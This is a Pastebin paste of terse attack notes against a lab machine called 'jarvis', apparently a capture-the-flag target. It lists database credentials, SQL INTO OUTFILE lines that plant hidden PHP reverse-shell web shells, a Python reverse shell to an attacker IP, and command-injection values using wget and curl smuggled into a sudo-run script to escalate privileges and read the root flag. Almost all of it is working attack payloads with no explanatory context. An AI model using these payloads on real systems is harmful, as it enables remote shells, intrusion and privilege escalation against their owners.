Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- MySQL
- user: DBadmin
- pass: imissyou
- database: hotel
- /etc/apache2/sites-available/default-ssl.conf
- xxj31ZMTZzkVA
- select '<?php exec("/bin/bash -c \'bash -i >& /dev/tcp/10.10.14.68/7979 0>&1\'"); ?>' INTO OUTFILE '/var/www/html/.shell3.php';
- select '<?php exec("/bin/bash -c \'bash -i >& /dev/tcp/10.10.14.68/8888 0>&1\'"); ?>' INTO OUTFILE '/var/www/html/.shell4.php';
- <?php exec("/bin/bash -c \'bash -i >& /dev/tcp/10.10.14.68/8888 0>&1\'"); ?>
- python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.68",8989));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'
- sudo -u pepper /var/www/Admin-Utilities/simpler.py -p
- $(wget http://10.10.14.68:9999/.pp.py)
- 10.10.10.143 $(curl http://10.10.10.143/.shell4.php)
- $(/bin/echo "os.system('\t/bin/cat /root/root.txt')" >> $(pwd)/simpler.py)
- User www-data may run the following commands on jarvis:
- (pepper : ALL) NOPASSWD: /var/www/Admin-Utilities/simpler.py
- /bin/sh
- service php7.0-fpm start
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement